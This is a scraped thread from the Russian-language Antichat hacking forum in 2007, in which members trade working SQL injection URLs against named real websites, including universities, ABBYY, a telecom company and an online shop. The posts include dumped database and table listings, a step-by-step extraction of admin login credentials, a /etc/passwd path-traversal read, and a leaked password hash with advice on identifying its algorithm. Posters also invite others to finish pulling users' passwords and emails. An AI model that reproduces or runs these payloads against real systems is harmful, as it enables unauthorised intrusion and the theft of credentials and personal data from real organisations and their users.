ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3021  
Старый 02.09.2007, 21:20
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

edu


не смог вывести пароли логины,кроме фамилий,имен и т.д

код
:http://fs.cs.fhm.edu/mitglieder.phtml?id=-48+union+select+1,concat(column_name,char(58),tabl e_name),3,4,5,6,7,8,9,10,11,12,13,14+from+informat ion_schema.columns+limit+650,1/*

Последний раз редактировалось fobofob; 02.09.2007 в 21:23..
 
Ответить с цитированием

  #3022  
Старый 02.09.2007, 23:41
Аватар для xena-mil1
xena-mil1
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме:
552846

Репутация: 55
Smile

Цитата:
Сообщение от [53x]Shadow  
ABBYY

Код:
http://www.abbyy.ru/press/press_releases.asp?param=-1+or+1=(select+db_name())--
http://www.abbyy.ru/sdk/?param=-1+or+1=(select+system_user)--
http://www.abbyy.com/press/press_releases.asp?param=136693+or+1=@@version--
Есть таблица user
продолжение

Код:
SQL Injection Private Exploit


System user: publishing 
Database name: Publishing 
Server name: SQL2 
IS Sysadmin ? : 0 
User databases number: 43 
User tables count in curent DB: 461 
Permission to create tables: Yes 
SQL Server version: 2000 
Windows version: 2003 



referendum

participantsInfo 
FineReaderSprintForm 
current_situation 
lingvo_interface_voting 
Anketa_sdk 
Seminar2005 
Anketa_PDFTransformer_rus 
lingvoMabileDevisesTesting 
FineReaderForm 
voting_lingvo_cards 
Anketa_FineReaderHomeEdition 
goroda_users_words 
voting_lingvo_sound 
voting_abbyy_ru 
dtproperties 
FR67_Trial_User_Survey_USA 
DealersForm 
voting_lingvo_search 
Anketa_FineReaderHomeEdition_2 
FR8_User_Survey_USA 
voting_abbyy_com 
DB_Export 
FR8_Trial_User_Survey_USA 
syssegments 
questions_list 
Digital_Camera_OCR 
Anketa_FineReaderSprint 
lingvo_valentine 
voting_lingvo_default_page 
Anketa_AbbyyRuHelpPoll 
FinereaderPRO8_Requests 
lingvoMobileDevicesTesting 
Anketa_PDFTransformer_1 
Anketa_PDFTransformer_2 
subscribes_partner_portal 
promo_beaver_action 
sysconstraints 
Anketa_STO_1 
USA_PartnersRegistration 
voting_metro_lingvo_adv

Lingvo_forum_1_3 
 
Lingvo_forum_next 
 
certification 
 
msdb 
 
abbyyru_FRCE90 
 
LingvoBannersTracking 
 
ReportServer 
 
Dialog_Forum_new 
 
voting 
 
Lingvo_RegistrationNY 
 
tempdb 
 
Lingvo_Forum_new 
 
docflow_referendum 
 
Docflow_Forum 
 
LingvoDA_Forum 
 
covercd 
 
AdventureWorks2000 
 
abbyycom_PDFTransformer 
 
FormReader_Forms 
 
LingvoDa_Forum_new 
 
IPDatabase 
 
WebStats 
 
dialog21_referendum 
 
ReportServerTempDB 
 
FineReader_forum_R 
 
master 
 
Lingvo_Forum 
 
tsla 
 
review 
 
docflow 
 
subscribe 
 
lingvoDa_Dictionaries 
 
QuotGame 
 
LPDatabase 
 
model 
 
Dialog_Forum 
 
KnowledgeBase 
 
SuccessStories_test 
 
Docflow_Forum_new 
 
Publishing 
 
TrialForms 
 
pubs 
 
SuccessStories 
 
ForumDialog_1_3 
 
SuccessStories2 
 
LingvoDA_referendum 
 
docflow_registration
результат

xena military private sql injection exploit v2.0

Последний раз редактировалось _Great_; 04.09.2007 в 15:20.. Причина: километровым шрифтом писать не пробовал?
 
Ответить с цитированием

  #3023  
Старый 03.09.2007, 03:27
Аватар для mindw0rk
mindw0rk
Познающий
Регистрация: 08.06.2007
Сообщений: 75
Провел на форуме:
517024

Репутация: 76
Отправить сообщение для mindw0rk с помощью ICQ
По умолчанию

uni.de инжектится во все дыры, плюс читалка http://www.uni.de/?goto=../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #3024  
Старый 03.09.2007, 12:46
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

http://www.menopausethemusical.com
Цитата:
http://www.menopausethemusical.com/main.php?page=reviews&get_id=-1+UNION+SELECT+1,2,CAST(USER()+AS+BINARY),4,CAST(D ATABASE()+AS+BINARY),CAST(VERSION()+AS+BINARY),7,8/*
 
Ответить с цитированием

  #3025  
Старый 03.09.2007, 15:50
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

http://www.matrixtelecom.ru. Компания Матрикс Телеком.

Практически любой параметр в передаваемых скриптам уязвим к SQL-Injection. Сложность состоит в том, что отключён вывод ошибок в страницу и фильтруется кавычка. Ну это скорее не сложность, а маленькая неприятность. Админка находится на урле http://www.matrixtelecom.ru/admin, которая требует авторизации доступа. Это не беда - тут есть SQL Injection. Приступим:

-- Определяем версию
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,DATABA SE()/*

-- Перебираем колонки (интересующая нас с индексом 16 и именем mx_conf)
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11+FR OM+INFORMATION_SCHEMA.TABLES+LIMIT+X,1/*

-- Перебираем поля в этой таблице
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+F ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x 6d785f636f6e66+LIMIT+X,1/*

-- Получаем структуру таблицы настроек сайта: mx_con(cnf_name, сnf_def, cnf_value)
-- Перебираем настройки сайта из таблицы mx_con
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+X,1/*

-- Нас интересует логин
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+0,1/*

-- И пароль
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+1,1/*

Всё... Доступ в админку открыт...

З.Ы. Администрация сайта уведомлена о данном баге. Не стоит дефейсить или менять контент.
 
Ответить с цитированием

  #3026  
Старый 03.09.2007, 18:22
Аватар для Rast1k
Rast1k
Banned
Регистрация: 09.08.2007
Сообщений: 56
Провел на форуме:
372630

Репутация: -63
Отправить сообщение для Rast1k с помощью ICQ
По умолчанию

Код:
http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version()  ,database()),4,5,6/*
Код:
http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 +from+information_schema.columns/*/
Код:
http://5ballov.ru/vacansy.php?city=Москва&salary_min=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,  11,12,13,14,15,16,17,18,19,20/*&schedule=свободный&sort=salary_min
Код:
http://www.gameland.ru/articles2/catalog/game.asp?code=1'
Great:
Цитата:
Инъекции вида:

http://site.ru/index.php?a='

будут удаляться.
либо ковыряй до конца, либо не пости. даю три дня, потом удаляю

Последний раз редактировалось _Great_; 04.09.2007 в 15:21..
 
Ответить с цитированием

  #3027  
Старый 03.09.2007, 22:59
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Google: PR - 7
http://primes.utm.edu
University of Tennessee at Martin Martin, TN 38238

Код:
http://primes.utm.edu/bios/page.php?id=&username=lol'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
4.1.20-log:primes_@localhost:primes
 
Ответить с цитированием

  #3028  
Старый 03.09.2007, 23:32
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Google: PR - 5
theboard.byu.edu


http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24/*

5.0.24-Debian_1-log:100hourboard@localhost:100hourboard

http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+TABLE_NAME,TABLE_SCHEMA,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+inf ormation_schema.tables+limit+150,1/*

смотрим таблици


[100hourboard]

100Hrbb_banlist
100Hrbb_categories
100Hrbb_config
100Hrbb_confirm
100Hrbb_disallow
100Hrbb_easymod
100Hrbb_forum_prune
100Hrbb_forums
100Hrbb_groups
100Hrbb_posts
100Hrbb_posts_text
100Hrbb_privmsgs
100Hrbb_privmsgs_text
100Hrbb_ranks
100Hrbb_search_results
100Hrbb_search_wordlist
100Hrbb_search_wordmatch
100Hrbb_sessions
100Hrbb_smilies
100Hrbb_themes
100Hrbb_themes_name
100Hrbb_topics
100Hrbb_topics_watch
100Hrbb_user_group
100Hrbb_vote_desc
и тд

вот нужные таблици но у меня нет начал лагать кто хочет подберите столбци и получите пассы и мыла
100Hrbb_users
phprojekt_users
 
Ответить с цитированием

  #3029  
Старый 04.09.2007, 00:02
Аватар для l-l00K
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

evruka.ru - Интернет-магазин
4.1.21-log:evrubase:giftshop@82.179.244.68
Подобрал название столбцов:
Код:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(username,char(58),passwd)+from+user+limit+141,141+--+
Получил: 89637:40f939d31d2e2a25
Но при запросе:
Код:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(passwd)+from+user+limit+141,141+--+
Получил совершенно другой хэш: 3e70346730b14ce7
У меня 2 вопроса почему так получается и каким алгоритмом шифруется пароль
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #3030  
Старый 04.09.2007, 00:35
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от l-l00K  
evruka.ru - Интернет-магазин
4.1.21-log:evrubase:giftshop@82.179.244.68
Подобрал название столбцов:
Код:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(username,char(58),passwd)+from+user+limit+141,141+--+
Получил: 89637:40f939d31d2e2a25
Но при запросе:
Код:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(passwd)+from+user+limit+141,141+--+
Получил совершенно другой хэш: 3e70346730b14ce7
У меня 2 вопроса почему так получается и каким алгоритмом шифруется пароль
1.Мож есть нулевое значение passwd (null)
2.MySQL (16 значный хеш) (не перепутай с Mysql5)
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ